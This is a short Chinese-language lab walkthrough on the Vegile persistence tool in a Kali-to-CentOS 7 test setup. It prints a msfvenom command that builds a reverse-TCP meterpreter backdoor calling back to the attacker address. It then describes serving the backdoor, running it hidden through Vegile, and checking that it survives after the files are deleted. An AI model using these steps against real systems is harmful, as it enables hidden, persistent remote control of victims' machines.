Vegile是linux中的權限維持工具。主要用來隱藏後門、和無限循環連接meterpreter來保持回話。
實驗環境:
1.attack:kali 192.168.72.131
2.target:centos7 192.168.72.132
3.Vegile、metasploit
一、前期準備
將Vegile上傳到kali的 /var/www/html下
kali生成後門程序保存到/var/www/html下
root@xuegod53:~# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.72.131 LPORT=4444 -b "\x00" -f elf -o /var/www/html/backdoor
二、metasploit監聽
運行exploit/multi/handler,配置反彈地址、端口,開啓監聽。
三、攻擊
下載Vegile和後門程序、執行程序
下載的時候出現以上問題是因爲沒有開啓Apache導致的,只要開啓就行了。
這樣就靶機就可以正常下載了。
因爲vegile是zip壓縮包,所以需要解壓。
這樣就下載好了vegile和後門backdoor,接下來就提高他們的執行權限。用vegile來執行後門。
然後返回kali中去看是否攻擊成功。
四、測試後門是否隱藏成功
刪除Vegile及後門程序,檢驗是否還可以連接後門
注:
1.後門一定要放到Vegile目錄下
2.上傳Vegile可以用shell來上傳
3.爲了不來回切換界面,可以使用命令終端ssh遠程連接centos7
4.chmod +x 提升授權,我自己常寫錯成 chmod -x。
vegile查看幫助